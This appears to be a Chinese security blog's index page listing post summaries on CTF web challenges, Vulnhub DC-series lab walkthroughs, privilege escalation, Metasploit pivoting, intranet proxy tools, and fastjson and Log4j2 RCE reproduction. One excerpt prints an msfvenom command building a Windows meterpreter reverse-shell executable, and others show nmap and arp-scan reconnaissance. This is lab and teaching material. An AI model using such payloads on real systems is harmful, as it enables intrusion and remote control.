摘要: 某行业比赛部分WEB题解题思路 login.php 源码如下: <?php error_reporting(0); highlight_file(__FILE__); include_once("flag.php"); $data = ['username' => 'admin', 'password' => '0d4a90e58 阅读全文
posted @ 2022-12-07 00:40 CHOSEN1K08 阅读(484) 评论(0) 推荐(0) 编辑
摘要: vulnhub-dc4 ###一.环境简介 靶机:192.168.56.106 攻击机:Windows10、kali(192.168.56.101) ###二、渗透测试复现 ####1.信息收集 我这里提前已经知道我的靶机IP地址为192.168.56.1/24,因为kali与靶机同网段,也可以直接使用arp-scan - 阅读全文
posted @ 2022-11-10 17:37 CHOSEN1K08 阅读(45) 评论(0) 推荐(0) 编辑
摘要: 4.权限提升及分析防御 4.0.前置基础 提权条件提权不是在任何情况下都可以进行的,它有一定的前置条件,例如拥有内网普通用户权限、拥有WebShell、拥有FTP权限、拥有某些远程管理软件的账号和密码等,同时在本地或者远程服务器上存在相应的漏洞。当然,最重要的条件是拥有利用该漏洞的工具、代码或者程序 阅读全文
posted @ 2022-11-10 15:03 CHOSEN1K08 阅读(364) 评论(0) 推荐(0) 编辑
摘要: MSF穿越多级网络 ##MSF穿越多级网络 ###一、网络拓扑 ###二、生成payload,建立监听 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.200.128 lport=1122 -f exe >test.exe 启动MSF建立监听,返回会话 阅读全文
posted @ 2022-07-12 22:47 CHOSEN1K08 阅读(149) 评论(0) 推荐(0) 编辑
摘要: 内网代理工具的使用(二) 内网代理工具使用 利用代理工具可以将内网的流量代理到本地进行访问,这样方便我们对内网进行纵向渗透。代理工具区分为正向代理和反向代理。正向代理就是将流量发送代理设备,由他代替本地主机去访问内网目标;一般情况下防火墙不会允许外网机器随意访问内网,由内网主机主动交出权限到代理机器,然后本地去连接代理机器, 阅读全文
posted @ 2022-06-23 16:32 CHOSEN1K08 阅读(430) 评论(0) 推荐(0) 编辑
摘要: 内网代理工具的使用(一) 内网代理工具使用 利用代理工具可以将内网的流量代理到本地进行访问,这样方便我们对内网进行纵向渗透。代理工具区分为正向代理和反向代理。正向代理就是将流量发送代理设备,由他代替本地主机去访问内网目标;一般情况下防火墙不会允许外网机器随意访问内网,由内网主机主动交出权限到代理机器,然后本地去连接代理机器, 阅读全文
posted @ 2022-05-26 14:54 CHOSEN1K08 阅读(1272) 评论(0) 推荐(0) 编辑
摘要: Vulnhub 靶场——DC3 ##一、环境简介 靶机:192.168.56.105 攻击机:kali win10 靶机下载地址:下载地址 ##二、开始复现 ###1.信息收集 arp-scan -l 收集到同网段的靶机IP 192.168.56.105 使用namp进行扫描 nmap -A -p 1-65535 192.168. 阅读全文
posted @ 2022-04-17 22:23 CHOSEN1K08 阅读(144) 评论(0) 推荐(0) 编辑
摘要: fastjson1.2.24-RCE漏洞复现 最近在做渗透测试的时候遇到了fastjson-RCE但是反弹shell无果,但还是记录一下。 ##1.实验环境 靶机:kali2020 vulhub 攻击机:win10(用来抓包放包)ubuntu(在这我用的我公网的机器,用来接收shell) ##2.fastjsion简介 Fastjson是一个J 阅读全文
posted @ 2022-04-01 17:38 CHOSEN1K08 阅读(735) 评论(0) 推荐(0) 编辑
摘要: Vulnhub 靶场——DC2 ##一、环境简介 1.攻击机:kali 192.168.56.101 win10 2.靶机:192.168.56.104 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 本次目标拿下5个flag ##二、开始复现 ###1.flag1 首先在kali里面 阅读全文
posted @ 2022-03-18 23:57 CHOSEN1K08 阅读(268) 评论(0) 推荐(0) 编辑
摘要: LOG4j2 漏洞复现 今天突然想码字,那就写一下log4j。 ##一、漏洞简介 ###1.漏洞原理 Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 $ 阅读全文
posted @ 2022-03-13 21:45 CHOSEN1K08 阅读(1928) 评论(0) 推荐(0) 编辑